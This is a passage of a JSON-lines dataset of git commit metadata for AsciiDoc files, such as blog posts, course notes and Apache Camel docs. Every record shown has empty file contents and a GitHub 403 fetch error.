403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18bf2d73f26d5cdebe297c6960d8d00d5007a7e2","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d979e6dd4535c7a84c3db6140082fa11a0b758f","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb,Acidburn0zzz\/winreg-kb","old_file":"documentation\/Application Compatibility Cache key.asciidoc","new_file":"documentation\/Application Compatibility Cache key.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c391a6fe8e7e99cef0cb88ab3e99b1c559e98e13","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d66fc1e3a90bccc696c275fc356c8c04538b88a7","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05e74a14124fb121eb75c230a8e7fdc4289398c3","subject":"Commit deletion for userguide\/tutorials\/aws-single-ami.adoc","message":"Commit deletion for userguide\/tutorials\/aws-single-ami.adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-single-ami.adoc","new_file":"userguide\/tutorials\/aws-single-ami.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6017dfe7a1fe28dd43491ae5b3b82045559961d","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 
2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27f6f89988bbd0df13ec2c85d04704941656b1d4","subject":"Much details about Papyrus auto install","message":"Much details about Papyrus auto install\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6cbf0c9f44f16f3573b64f8eb1187584226287","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/http-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/http-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55e011de9ef2326452375b1d8a7e46126005e4a0","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18bfdd824f2792f3cc764f957ce6afd2d0ad9d8e","subject":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","message":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39cbe65b50cd7a6a268af1f069bc3dc2060795c8","subject":"added","message":"added\n","repos":"m-m-m\/orient","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/orient.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8b511c20f63353363f14a43015c48acf72f2c44","subject":"Ex JUnit","message":"Ex 
JUnit\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Divers\/JUnit.adoc","new_file":"Divers\/JUnit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37efd0ddf80f31b51e01c7e2ed746943c2cc7d9e","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60ed0366a6f8e521ad17360fe6b1ed5a111302a8","subject":"Update 2015-11-08-Ihr-seid-gefragt.adoc","message":"Update 2015-11-08-Ihr-seid-gefragt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90038be041339bf9898076c20c483c73b6cd1ebc","subject":"Some notes","message":"Some notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d398337d15e074f01d1adbb8a610dcbf989d15a4","subject":"Update 2014-04-18-Engaged-Invention.adoc","message":"Update 2014-04-18-Engaged-Invention.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ff6c519a2d1e184115ff6ebbe74062706796ea6","subject":"Update 2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","message":"Update 2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","new_file":"_posts\/2013-12-10-jboss-eap-62-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a2187098e48477e5984644184f920aa543bd4f0","subject":"Planning","message":"Planning\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1827e58d2eb88ce61376a511f75cd2186103948e","subject":"Deadline eclipse","message":"Deadline eclipse\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice bis.adoc","new_file":"Dev tools\/Exercice bis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9f0e835568b07990730a243028adcac16d6d23d","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"infinispan\/infinispan-remote\/readme.adoc","new_file":"infinispan\/infinispan-remote\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fe39c9689345ef8581168fe489c4bf0f0903655","subject":"Update 2016-12-07-Back-Date-This.adoc","message":"Update 2016-12-07-Back-Date-This.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-07-Back-Date-This.adoc","new_file":"_posts\/2016-12-07-Back-Date-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c442a4ff123f54583bae3f3fe60eb239b4675bf","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a39e7ab1ade09b70801933ad3452ce12dba9a89","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"279062995a1525a610c7f4e70afee4d010bd759d","subject":"Update 2017-05-04-Test.adoc","message":"Update 2017-05-04-Test.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-04-Test.adoc","new_file":"_posts\/2017-05-04-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"175f117030c86504251b1e7018add100a1a64aa4","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f4fc0c50fdf7f38cad70975037cbb40e85b9f61","subject":"Update 2015-09-14-.adoc","message":"Update 2015-09-14-.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-.adoc","new_file":"_posts\/2015-09-14-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"013f2d3f594cc389f206a0f7a8a7c3b27dbdc517","subject":"Update 2017-12-03-.adoc","message":"Update 2017-12-03-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-.adoc","new_file":"_posts\/2017-12-03-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62d9062952f5724153e3e1a5ba9616e28d062c0a","subject":"Update 2019-01-13-.adoc","message":"Update 2019-01-13-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-.adoc","new_file":"_posts\/2019-01-13-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0310616c736b4e96136e1141d47d7257385e73dc","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38aa2bd653e07b3b900e7edd2368792e029990dd","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/fighting_my_prejudices.adoc","new_file":"content\/writings\/fighting_my_prejudices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9058fc18bab948df850e8ff6790e677a3772ae61","subject":"Small fixes","message":"Small 
fixes\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch09-cicd.adoc","new_file":"developer-tools\/java\/chapters\/ch09-cicd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0832d2dcbf2e8453a7d86623c7b0450c8359b5d1","subject":"Update 2015-10-01-Daisies-arent-roses.adoc","message":"Update 2015-10-01-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c972fa964eccfbf342e56f83e54f323a85431cb","subject":"Publish 2016-01-012-HubPress-CNAME-and-A-Records.adoc","message":"Publish 2016-01-012-HubPress-CNAME-and-A-Records.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_file":"2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0131c46c0d08c3784c4b37cc92cbd61da8f85b","subject":"y2b create post iPhone Signal Booster - Does It Suck?","message":"y2b create post iPhone Signal Booster - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-27-iPhone-Signal-Booster--Does-It-Suck.adoc","new_file":"_posts\/2016-11-27-iPhone-Signal-Booster--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b869562a8c3d52053a5ddb926ad74893c48079f2","subject":"Added InOnly EIP docs","message":"Added InOnly EIP 
docs\n","repos":"tdiesler\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,dmvolod\/camel,punkhorn\/camel-upstream,tdiesler\/camel,pmoerenhout\/camel,tdiesler\/camel,tadayosi\/camel,sverkera\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,snurmine\/camel,pax95\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,sverkera\/camel,objectiser\/camel,jonmcewen\/camel,adessaigne\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,dmvolod\/camel,apache\/camel,akhettar\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,kevinearls\/camel,jamesnetherton\/camel,pax95\/camel,ullgren\/camel,gautric\/camel,onders86\/camel,kevinearls\/camel,gautric\/camel,mcollovati\/camel,tadayosi\/camel,jonmcewen\/camel,sverkera\/camel,kevinearls\/camel,akhettar\/camel,Fabryprog\/camel,anoordover\/camel,akhettar\/camel,anoordover\/camel,christophd\/camel,Fabryprog\/camel,dmvolod\/camel,punkhorn\/camel-upstream,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,gautric\/camel,curso007\/camel,DariusX\/camel,pax95\/camel,sverkera\/camel,cunningt\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,onders86\/camel,christophd\/camel,Fabryprog\/camel,ullgren\/camel,cunningt\/camel,kevinearls\/camel,adessaigne\/camel,zregvart\/camel,pmoerenhout\/camel,jamesnetherton\/camel,objectiser\/camel,apache\/camel,snurmine\/camel,jonmcewen\/camel,gautric\/camel,gnodet\/camel,alvinkwekel\/camel,gautric\/camel,cunningt\/camel,zregvart\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,anoordover\/camel,dmvolod\/camel,objectiser\/camel,snurmine\/camel,DariusX\/camel,dmvolod\/camel,nicolaferraro\/camel,DariusX\/camel,jamesnetherton\/camel,sverkera\/camel,akhettar\/camel,anoordover\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,pmoerenhout\/camel,snurmine\/camel,gnodet\/camel,ullgren\/camel,Fabryprog\/camel,jonmcewen\/camel,onders86\/camel,kevinearls\/camel,mcollovati\/camel,mcollovati\/camel,snurmine\/camel,christophd\/camel,jonmcewen\/camel,anoordover\/camel,kevinearls\/camel,nikhilvibhav\/camel,cunningt\/camel,zregvart\/camel,nicolaferraro\/camel,CodeSmell\/camel,apache\/camel,alvinkwekel\/camel,sverkera\/camel,CodeSmell\/camel,christophd\/camel,jamesnetherton\/camel,dmvolod\/camel,mcollovati\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,gnodet\/camel,objectiser\/camel,jamesnetherton\/camel,curso007\/camel,pax95\/camel,onders86\/camel,curso007\/camel,davidkarlsen\/camel,onders86\/camel,gnodet\/camel,ullgren\/camel,gautric\/camel,nicolaferraro\/camel,davidkarlsen\/camel,onders86\/camel,akhettar\/camel,CodeSmell\/camel,curso007\/camel,christophd\/camel,DariusX\/camel,akhettar\/camel,curso007\/camel,tadayosi\/camel,tdiesler\/camel,jonmcewen\/camel,pmoerenhout\/camel,alvinkwekel\/camel,curso007\/camel,snurmine\/camel,alvinkwekel\/camel,anoordover\/camel,pmoerenhout\/camel,tadayosi\/camel,apache\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/inOnly-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/inOnly-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e73843cbf43b3bb717c60829675b36385bce377","subject":"Started documenting paredit features","message":"Started documenting paredit features\n","repos":"rundis\/clj-light-refactor","old_file":"PAREDIT.adoc","new_file":"PAREDIT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/rundis\/clj-light-refactor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b98c3ef2dd475c6e03395a92e85e23e96009126","subject":"create post DON'T Buy The Batband, Unless...","message":"create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-DONT-Buy-The-Batband,-Unless....adoc","new_file":"_posts\/2018-02-26-DONT-Buy-The-Batband,-Unless....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4300a9b9c362d3301c374d3b317829a9a8f4e42","subject":"Update 2017-04-27-Week-5-Lets-play-guitar.adoc","message":"Update 2017-04-27-Week-5-Lets-play-guitar.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-27-Week-5-Lets-play-guitar.adoc","new_file":"_posts\/2017-04-27-Week-5-Lets-play-guitar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1e86771a6b4bcddc539766ef969c0682181baf6","subject":"Update 2013-03-23-Wicket-and-JQPlot.adoc","message":"Update 2013-03-23-Wicket-and-JQPlot.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2013-03-23-Wicket-and-JQPlot.adoc","new_file":"_posts\/2013-03-23-Wicket-and-JQPlot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ad4d310509d1d8b4c252f16fa623459d4dc3bc7","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9d8e78485c6247d399437fe0b0b6ec97a848dfe","subject":"Delete the file at '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc'","message":"Delete the file at '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4077705d59b67c81cb8fc16194d177732db0c23d","subject":"Renamed '_posts\/2017-05-31-TWCTF-2017.adoc' to '_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","message":"Renamed '_posts\/2017-05-31-TWCTF-2017.adoc' to 
'_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"688653f735cf68bb73ac2a171f0b3ae0a93187b3","subject":"y2b create post HKS Racing Controller (PS3) Unboxing \\u0026 Overview","message":"y2b create post HKS Racing Controller (PS3) Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-15-HKS-Racing-Controller-PS3-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-09-15-HKS-Racing-Controller-PS3-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68bb20c4548fdd38272fee30d93304c3a6526ed1","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 